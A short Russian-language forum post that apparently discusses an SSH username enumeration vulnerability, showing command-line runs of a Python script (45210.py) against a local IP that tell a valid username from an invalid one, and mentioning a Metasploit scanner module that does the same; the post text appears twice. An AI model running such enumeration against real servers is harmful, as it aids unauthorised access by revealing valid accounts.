sosiskapi
Green Team
- 28.12.2016
- 57
- 22
Очень мало ознакомился с данной уязвимостью, надеюсь мне помогут и знающие люди допишут полезной инфы в комментах.
Скрипт на питоне по адресу
Пример с правельным username
└──╼ $python2.7 45210.py --port 22 192.168.1.2 root
[+] Valid username
Не правильный
└──╼ $python2.7 45210.py --port 22 192.168.1.2 admin
[*] Invalid username
Так и не понял суматохи по поводу этой уязвимости, ведь есть auxiliary(scanner/ssh/ssh_enumusers) которая , также помогает узнать username
Скрипт на питоне по адресу
Ссылка скрыта от гостей
позволяет перечислять имена пользователей.Пример с правельным username
└──╼ $python2.7 45210.py --port 22 192.168.1.2 root
[+] Valid username
Не правильный
└──╼ $python2.7 45210.py --port 22 192.168.1.2 admin
[*] Invalid username
Так и не понял суматохи по поводу этой уязвимости, ведь есть auxiliary(scanner/ssh/ssh_enumusers) которая , также помогает узнать username
Последнее редактирование:
